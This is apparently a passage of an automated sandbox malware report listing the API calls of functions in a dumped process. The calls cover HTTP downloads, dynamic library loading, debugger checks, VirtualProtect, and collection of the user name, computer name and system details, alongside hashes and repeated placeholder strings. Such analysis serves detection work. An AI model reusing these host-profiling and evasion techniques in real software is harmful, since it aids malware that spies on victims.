lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
strlen.MSVCRT ref: 004046F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 0040479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

Function 00406280 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 00406385
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D

Strings

ERROR, xrefs: 004064C9
GET, xrefs: 0040637C
ERROR, xrefs: 00406407

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$??2@$HttpOpenRequest$ConnectCrackFileReadSend
String ID: ERROR$ERROR$GET
API String ID: 1095854997-2509457195
Opcode ID: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
Opcode Fuzzy Hash: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

Function 00417850 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2

Function 00401160 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

Function 00419C10 Relevance: 18.2, APIs: 8, Strings: 2, Instructions: 684
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8

Strings

InternetSetOptionA, xrefs: 0041A5E5
HttpQueryInfoA, xrefs: 0041A5FC

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 1029625771-1775429166
Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

Function 00404880 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 479
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetCloseHandle.WININET(00000000), ref: 00404EAD

Strings

", xrefs: 00404BF2
------, xrefs: 00404B28
------, xrefs: 00404C69
------, xrefs: 004049BD
", xrefs: 00404D33

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ??2@$Internet$CloseCrackHandle
String ID: "$"$------$------$------
API String ID: 3842476067-2180234286
Opcode ID: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
Opcode Fuzzy Hash: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

Function 004047B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Strings

<, xrefs: 004047C9

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternet
String ID: <
API String ID: 676793843-4251816714
Opcode ID: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
Opcode Fuzzy Hash: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

Function 00419860 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419A9A
LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419AAB
LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419ACF

Strings

NtQueryInformationProcess, xrefs: 00419BAA

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 1029625771-2781105232
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

Function 004117A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 004117D1
strtok_s.MSVCRT ref: 004117E8
strtok_s.MSVCRT ref: 004119A8

Strings

block, xrefs: 004117B7

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s$ExitProcess
String ID: block
API String ID: 762877946-2199623458
Opcode ID: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
Opcode Fuzzy Hash: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

Function 00417500 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F

Strings

\, xrefs: 00417560
:, xrefs: 0041755C
C, xrefs: 0041754C

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID: :$C$\
API String ID: 2039140958-3809124531
Opcode ID: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
Opcode Fuzzy Hash: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

Function 00401220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __aulldiv$GlobalMemoryStatus
String ID: @
API String ID: 2185283323-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

Function 004169F0 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401160: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A

Part of subcall function 00401110: VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266

GetUserDefaultLCID.KERNELBASE ref: 00416A26

Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
String ID:
API String ID: 3178950686-0
Opcode ID: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
Instruction ID: 00249ead6714b3af85de48d5768f0cff66b99727dd84f15ff7ce73ce32af2852
Opcode Fuzzy Hash: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
Instruction Fuzzy Hash: 63316175940208AADB04FBF2DC56BEE7339AF04354F10452EF102A61D2DF7C6996C6AE

Function 004178E0 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

